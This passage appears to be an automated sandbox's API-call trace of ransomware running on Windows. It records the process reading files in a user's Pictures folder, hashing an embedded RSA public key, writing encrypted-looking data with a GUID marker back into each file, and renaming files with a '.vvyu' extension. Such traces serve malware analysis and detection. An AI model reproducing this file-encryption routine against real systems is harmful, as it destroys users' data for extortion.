[0191.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0191.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0191.203] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0191.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0191.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0191.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ff0 [0191.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0191.204] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0191.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0191.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0191.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0191.204] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6008 [0191.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0191.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0191.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0191.205] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fd8 [0191.205] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0191.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6068 [0191.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e40 [0191.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0191.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6038 [0191.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e40 | out: hHeap=0x2c0000) returned 1 [0191.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6020 [0191.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6080 [0191.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6020 [0191.206] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6038 | out: hHeap=0x2c0000) returned 1 [0191.206] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e20 [0191.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0191.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0191.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0191.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0191.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ff0 [0191.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0191.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0191.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6050 | out: hHeap=0x2c0000) returned 1 [0191.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0191.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6080 | out: hHeap=0x2c0000) returned 1 [0191.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0191.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0191.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0191.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0191.207] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5ff0 | out: hHeap=0x2c0000) returned 1 [0191.207] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0191.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0191.208] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0191.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0191.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0191.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae01d0 | out: hHeap=0x2c0000) returned 1 [0191.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae03e0 | out: hHeap=0x2c0000) returned 1 [0191.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0191.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0191.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0191.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0191.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7dc0 | out: hHeap=0x2c0000) returned 1 [0191.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0191.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fd8 | out: hHeap=0x2c0000) returned 1 [0191.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae2eb8 | out: hHeap=0x2c0000) returned 1 [0191.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0191.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0191.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5fc0 | out: hHeap=0x2c0000) returned 1 [0191.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3738 | out: hHeap=0x2c0000) returned 1 [0191.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0191.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a19588 | out: hHeap=0x2c0000) returned 1 [0191.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26b08 | out: hHeap=0x2c0000) returned 1 [0191.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0191.213] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x1853c, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x1853c, lpOverlapped=0x0) returned 1 [0191.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0191.214] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x18541, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.214] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0191.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0191.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0191.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0191.215] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0191.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0191.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.215] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0191.215] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0191.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0191.216] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0191.216] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0191.216] CloseHandle (hObject=0x584) returned 1 [0191.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x2a40108 [0191.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x2af3f88 [0191.218] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a40108 | out: hHeap=0x2c0000) returned 1 [0191.218] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\rWx9qkj.png" (normalized: "c:\\users\\keecfmwgj\\pictures\\rwx9qkj.png"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\rWx9qkj.png.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\rwx9qkj.png.vvyu")) returned 1 [0191.219] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.220] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0191.223] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0191.223] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4c8ca6f0, ftCreationTime.dwHighDateTime=0x1d8a5a6, ftLastAccessTime.dwLowDateTime=0x7eee78c0, ftLastAccessTime.dwHighDateTime=0x1d8a6ec, ftLastWriteTime.dwLowDateTime=0x7eee78c0, ftLastWriteTime.dwHighDateTime=0x1d8a6ec, nFileSizeHigh=0x0, nFileSizeLow=0xb664, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sfoK-fQjQEuAHhw.jpg", cAlternateFileName="SFOK-F~1.JPG")) returned 1 [0191.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3738 [0191.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ee78 [0191.224] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3738 | out: hHeap=0x2c0000) returned 1 [0191.224] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\sfoK-fQjQEuAHhw.jpg") returned=".jpg" [0191.224] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\sfoK-fQjQEuAHhw.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\sfok-fqjqeuahhw.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0191.225] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=46692) returned 1 [0191.225] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0191.230] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb63e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.230] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0191.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.233] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0191.233] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xb664, lpOverlapped=0x0) returned 1 [0191.234] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0191.234] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.234] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0191.234] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0191.236] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0191.236] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0191.236] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0191.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0191.236] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0191.236] GetLastError () returned 0x0 [0191.236] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0191.236] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0191.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0191.237] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0191.237] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0191.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.237] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0191.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0191.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0191.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb660) returned 0x2af5168 [0191.237] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0191.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0191.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0191.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0191.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0191.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0191.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3738 [0191.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fc0 [0191.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3780 [0191.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5fd8 [0191.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6008 [0191.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6068 [0191.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6020 [0191.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0191.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0191.239] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0191.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0191.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0191.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0191.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae6068 [0191.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0191.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae6020 [0191.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ac8 [0191.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae6008 [0191.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0191.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0191.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0191.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0191.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0191.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0191.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ae8 [0191.241] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0191.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0191.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6020 | out: hHeap=0x2c0000) returned 1 [0191.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0191.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6008 | out: hHeap=0x2c0000) returned 1 [0191.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ac8 | out: hHeap=0x2c0000) returned 1 [0191.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0191.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae6068 | out: hHeap=0x2c0000) returned 1 [0191.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0191.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0191.243] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0191.243] GetCurrentThreadId () returned 0x5d8 [0191.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0191.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae5928 [0191.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0191.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0191.243] RtlAllocateHeap 